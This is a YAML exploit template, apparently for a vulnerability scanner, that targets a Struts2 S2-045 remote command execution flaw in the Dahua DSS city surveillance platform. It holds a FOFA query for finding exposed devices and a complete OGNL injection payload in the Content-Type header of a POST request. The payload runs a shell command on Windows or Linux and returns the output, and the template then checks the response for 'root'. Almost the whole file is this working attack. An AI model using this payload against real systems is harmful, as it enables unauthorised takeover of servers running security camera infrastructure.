product: 大华DSS城市安防监控平台
vName: 大华DSS城市安防监控平台user_toLoginPage.action接口Struct2-045命令执行
type: 命令执行
vID: [ ]
level: 3
vDesc: 大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。/config/user_toLoginPage.action接口存在远程命令执行漏洞，攻击者可以通过在上传文件时修改HTTP请求标头中的Content
  Type值来触发该漏洞，然后执行该漏洞。系统命令以获取服务器权限。
version: ''
note: ''
search:
  FOFA: app="dahua-DSS"
protocol: http
link: https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8E/%E5%A4%A7%E5%8D%8EDSS%E5%9F%8E%E5%B8%82%E5%AE%89%E9%98%B2%E7%9B%91%E6%8E%A7%E5%B9%B3%E5%8F%B0user_toLoginPage.action%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8Struct2-045%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /portal/user_toLoginPage.action
      header:
        Content-Type: '%{(#nike=''multipart/form-data'').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[''com.opensymphony.xwork2.ActionContext.container'']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=''whoami'').(#iswin=(@java.lang.System@getProperty(''os.name'').toLowerCase().contains(''win''))).(#cmds=(#iswin?{''cmd.exe'',''/c'',#cmd}:{''/bin/bash'',''-c'',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - root
            logic: and